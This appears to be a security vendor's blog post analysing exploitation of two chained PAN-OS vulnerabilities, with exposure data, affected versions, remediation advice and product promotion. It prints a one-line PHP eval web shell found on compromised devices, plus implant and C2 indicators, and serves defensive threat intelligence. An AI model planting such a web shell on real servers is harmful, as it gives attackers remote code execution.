Palo Alto Networks recently disclosed two critical vulnerabilities affecting PAN-OS that were suspected of being exploited in the wild as 0days, and they later confirmed their active exploitation: the first vulnerability is an authentication bypass (CVE-2024-0012) and the second is a privilege escalation vulnerability (CVE-2024-9474).
When chained together, these two vulnerabilities allow unauthenticated remote code execution (RCE) on the PAN-OS management interface. An attacker with network access to the interface can exploit CVE-2024-0012 to bypass authentication and then leverage CVE-2024-9474 to escalate privileges, ultimately gaining administrator access and performing arbitrary administrative actions. Exploitation has been observed in the wild by Palo Alto and other organizations tracking this activity since November 17, 2024, and has dramatically increased since the publication of a valid proof-of-concept exploit on November 19th. The ShadowServer Foundation have stated that at least 2,000 instances have been compromised worldwide so far.
What is CVE-2024-0012?
CVE-2024-0012 enables attackers to bypass authentication on the PAN-OS management interface, escalate privileges to administrator-level, potentially exploiting related vulnerabilities such as CVE-2024-9474 which provides access to other administrative functions.
What is CVE-2024-9474?
CVE-2024-9474 is a privilege escalation vulnerability in Palo Alto Networks PAN-OS software that enables a PAN-OS administrator with access to the management web interface to execute firewall actions with root privileges. It also enables code execution through a simple POST request that creates a PHP session. This vulnerability has been chained with CVE-2024-0012 in observed attacks.
So far, reported post-exploitation activity includes interactive command execution and deploying malicious payloads like web shells on compromised devices.
Wiz Research data: what’s the risk to cloud environments?
Based on Wiz data, 24% of cloud enterprise environments contain virtual PAN-OS devices vulnerable to these CVEs (based on affected version ranges).
Among those vulnerable, 7% of environments contain Internet-facing devices that are exploitable to unauthenticated remote code execution, as validated by our Dynamic Scanner.
What sort of exploitation has been identified in the wild?
Wiz has observed ongoing exploitation of these vulnerabilities in the wild to compromise virtual PAN-OS devices in cloud environments since November 19th, likely as an immediate result of the public release of a proof-of-concept exploit. In several cases we observed, the threat actors abused their access to deploy web shells, Sliver implants and/or crypto miners.
Some of the observed activity may also stem from legitimate scans utilizing generic payloads for proof-of-concept purposes, as we have detected what appear to be “dummy” payloads deployed across several devices as a result of exploitation, using seemingly random file names: /var/appweb/htdocs/unauth/{between 4 and 6 random characters}.php. The choice of path might indicate that someone repurposed this exploit which simply writes “watchTowr.php” to the same path. Many of these web shells are very simple and contain the following code with slight variations:
<?php eval($_POST[1]);?>
eval($_POST[1]);?> In multiple instances, we’ve identified re-use of the same Sliver implant (b4378712adf4c92a9da20c0671a06d53cbd227c8) which uses 77.221.158[.]154 as its C2 address. This IP address has previously resolved the domain censysinspect[.]com, though the domain has since been parked:
Based on an analysis of related VirusTotal submissions, the same implant can also be found hosted on what appear to be legitimate but compromised web servers running unrelated software, indicating that the threat actor may be running wide scans for vulnerable servers and abusing using them for staging purposes. However, we’re unable to confirm if the same threat actor is indeed behind both activities. Furthermore, we believe these activities to be strictly opportunistic, and likely distinct from the 0day exploitation activity reported by Palo Alto.
censysinspect[.]com itself has previously served as a C2 address for several other Sliver implants, some of which have been hosted on compromised PAN-OS devices as of a few months ago, as indicated by their file-path, global-protect/portal/fonts/Latte-Regular.woff. This could indicate that this particular threat actor has been opportunistically compromising PAN-OS devices using various methods over a period of several months, and has also been using them to stage malware.
We’ll be updating this blogpost with additional research findings as we continue our investigation.
Which products are affected?
The following products are affected by CVE-2024-0012. In addition to these versions, PAN-OS versions before 10.1.14-h6 are impacted by CVE-2024-9474.
| Version | Affected |
|---|---|
| PAN-OS 11.2 | < 11.2.4-h1 |
| PAN-OS 11.1 | < 11.1.5-h1 |
| PAN-OS 11.0 | < 11.0.6-h1 |
| PAN-OS 10.2 | < 10.2.12-h2 |
Which actions should security teams take?
It is recommended to upgrade to the latest version of PAN-OS that includes a patch for these vulnerabilities. The upgrade should be performed according to the official guidance provided by Palo Alto Networks in their advisories. Additionally, customers should secure access to the management interface by restricting access only to trusted IP addresses, reducing the attack surface and the likelihood of exploitation while ensuring no malicious exploitation has been already utilized on the device.
How Wiz can help
The Wiz Threat Intelligence Center was updated on November 10th (9 days before a public proof-of-concept exploit emerged) to warn our customers of suspected exploitation of a 0day vulnerability affecting PAN-OS devices as soon as initial information became available, and we’ve been continuously updating our customer advisory since then with the latest information about these vulnerabilities, most notably when the vulnerabilities were confirmed by Palo Alto and the public proof-of-concept exploit was published.
Wiz customers can use the pre-built queries and advisory in the Wiz Threat Intelligence Center to search for vulnerable or compromised instances of PAN-OS in their environment.
Wiz detects vulnerable and/or infected PAN-OS devices through a combination of agentless scanning of our customers’ cloud environments and active unauthenticated scanning using the Wiz Dynamic Scanner, based on this Nuclei template originally published by watchTowr. We can confirm that this template accurately detects vulnerable instances without executing code on the target resource.
What’s special about Wiz response ability to high-profile threats
At Wiz, we’ve built a platform uniquely equipped to respond to high-profile threats to cloud environments with unmatched agility and depth.
By integrating disk-level insights, external exploitation validation, and compromised machines with malware detection, Wiz provides full visibility across the lifecycle of exploitation and risk identification – all without the use of agents.
When new threats emerge, Wiz helps you:
Identify vulnerable software versions in your environment, with additional runtime context using the Wiz Sensor.
Validate actual exploitability from the outside and prioritize risks effectively, based on the context of affected resources such as high privileges or sensitive data access.
Gain visibility into instances that were already targeted and compromised by threat actors.
This unique approach gives you full transparency and control, so you can stay ahead of attackers and protect what matters most to your business.
